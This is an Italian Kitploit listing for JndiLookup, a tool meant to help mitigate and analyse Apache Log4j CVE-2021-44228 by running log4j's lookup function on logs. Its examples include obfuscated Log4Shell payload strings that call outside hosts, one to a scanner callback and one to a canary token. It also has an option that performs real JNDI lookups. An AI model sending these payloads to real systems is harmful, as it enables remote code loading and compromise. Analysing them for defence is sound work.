Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
JndiLookup — Alcuni strumenti per aiutare a mitigare Apache Log4j 2 CVE-2021-44228 | Kitploit
Strumenti/GitHubGitHub/madcdan/jndilookup
Analisi Dinamica (Sandboxing)Generazione di PayloadAnalisi delle VulnerabilitàExploitCommand and ControlAnalisi dei Log
GitHubmadcdan/jndilookup

JndiLookup

Alcuni strumenti per aiutare a mitigare Apache Log4j 2 CVE-2021-44228

Vedi Repository
324 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

JndiLookup

Alcuni strumenti per aiutare l'analisi di Apache Log4j 2 CVE-2021-44228

Questo strumento usa la funzionalità "lookup" di log4j-2 per testare la vulnerabilità JNDI. L'obiettivo è eseguire facilmente la funzionalità di lookup (per normalizzare i log, ad esempio, o per fare un test reale su alcuni payload - si prega di prestare attenzione).

Per compilare: "make" (per comodità, il file JndiLookup.jar è incluso in questo git).

Una volta compilato, puoi eseguire lo strumento con "java -jar JndiLookup.jar" (la directory log4j con i binari di log4j deve trovarsi nello stesso percorso di JndiLookup.jar)

Senza argomenti, lo strumento JndiLookup legge le righe da stdin e le "converte" usando la funzionalità di lookup di log4j - questo dovrebbe essere utile per normalizzare i log e cercare tentativi di sfruttamento.

Per esempio : cat access.log | java -jar JndiLookup.jar

Se passi una stringa da riga di comando, lo strumento convertirà questa stringa e terminerà (si prega di eseguire l'escape di tutti i caratteri '$').

Per esempio : java -jar JndiLookup.jar java -jar JndiLookup.jar "\${jndi:\${lower:l}\${lower:d}a\${lower:p}://world443.log4j.bin\${upper:a}ryedge.io:80/callback}"

Per impostazione predefinita, il lookup JNDI è disabilitato (e sostituito da una funzione di lookup che aggiungerà solo "jndi:" ma è possibile abilitare il vero lookup JNDI passando il parametro "-X" a JndiLookup ("-X" da passare come primo parametro) ; SIATE MOLTO CAUTI con questo perché potrebbe portare al compromissione del vostro sistema.

Per esempio : java -jar JndiLookup.jar -X "\${jndi:ldap://w8pcb14reujq65vic39pz9amv.canarytokens.com/a}" [ Questo esempio usa uno dei miei canary token, è solo per l'esempio ; sappiate che verrò notificato se usate questo comando - nessun problema da parte mia ma otterrò l'IP da cui viene effettuata la richiesta DNS ]

I seguenti lookup sono abilitati nei binari log4j utilizzati (2.15.0 per l'uso standard, 2.14.1 per l'uso con JNDI abilitato) :

  • log4j
  • sys
  • env
  • main
  • marker
  • java
  • base64
  • lower
  • upper
  • date
  • ctx

Altri lookup potrebbero essere disponibili a seconda del vostro ambiente :

  • docker
  • kubernetes
  • spring
  • jvmrunargs

[ Si prega di vedere https://github.com/apache/logging-log4j2/blob/c30a1398a6697fb832c650870c44284d0052103e/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/Interpolator.java per i dettagli sull'attivazione dei plugin di lookup]

Si prega di notare che questo strumento usa il codice reale della funzionalità di lookup di log4j e potrebbe essere vulnerabile a causa di altri problemi di sicurezza (non-JNDI).

Scarica lo strumento